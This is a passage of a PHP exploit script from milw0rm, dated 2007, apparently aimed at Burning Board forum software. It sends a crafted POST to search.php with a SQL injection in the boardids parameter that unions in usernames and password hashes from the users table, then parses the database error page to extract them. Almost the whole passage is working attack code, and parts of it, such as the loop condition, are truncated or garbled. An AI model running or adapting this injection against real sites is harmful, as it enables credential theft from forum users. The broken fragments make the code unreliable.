'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} $path .= "search.php"; if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} $boardids="boardids%5B%5D=$boardid) UNION SELECT username,password FROM ".$prefix."users WHERE 1 NOT IN (0,0"; $data = "searchstring=$searchstring&searchuser=&name_exactly=1&$boardids&showposts=0&searchdate=0"; $data .= "&beforeafter=after&sortby=lastpost&sortorder=desc&send=send&submit=Suchen"; $packet ="POST ".$p." HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Cookie: wbb_userpassword=0;\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacketii($packet); if (eregi("Database error",$html)){ echo "vulnerable...

"; $temp1=explode("b.boardid IN (",$html); $temp2=explode(")",$temp1[1]); $temp3=explode("&sid=",$temp2[0]); $temp4=$temp3[0]; $temp5=explode(",",$temp4); for ($i=0;$i"; } } ?> # milw0rm.com [2007-01-17]